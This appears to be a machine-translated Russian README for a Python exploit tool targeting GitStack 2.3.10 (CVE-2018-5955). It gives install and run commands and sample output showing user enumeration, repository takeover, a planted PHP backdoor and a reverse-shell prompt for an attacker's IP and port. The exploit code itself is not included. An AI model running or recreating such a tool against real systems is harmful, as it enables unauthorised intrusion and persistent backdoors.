Эксплойт для CVE-2018-5955 Gitstack 2.3.10 unautenticated rce
Эксплойт: GitStack 2.3.10.
Дата: 18.01.2018
Ссылка на программное обеспечение: https://gitstack.com/
Эксплойт автор: Kacper Szurek
Оригинальный эксплойт: https://www.exploit-db.com/exploits/43777
Веб -сайт: https://security.szurek.pl/
Категория: удаленная
CVE: CVE-2018-5955
Дата: 23.06.2023
Новые функции: интерактивный RCE, ОС обнаружение, функция обратной оболочки, адаптирована от Python2 к Python3
CVE: CVE-2018-5955
Категория: удаленная
Я не несу никакой ответственности за ваши действия, так как я разместил их на GitHub для образовательных целей или сертифицированные и уполномоченные тестирование на проникновение
Установить требования:
pip install colorama
Затем вы можете запустить его с:
python3 exploit.py
ОС будет обнаружена после того, как вы используете CVE, на самом деле будет эта линия вывода: «[*] OS: $ OperatingSystem» (Dimostration ниже)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Вы также можете ввести «ОС», чтобы выяснить, какой тип операционной системы
Чтобы получить фактическую обратную оболочку на цель, вы можете ввести «оболочку», а затем введите свой IP и ваш порт прослушивания, как это:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE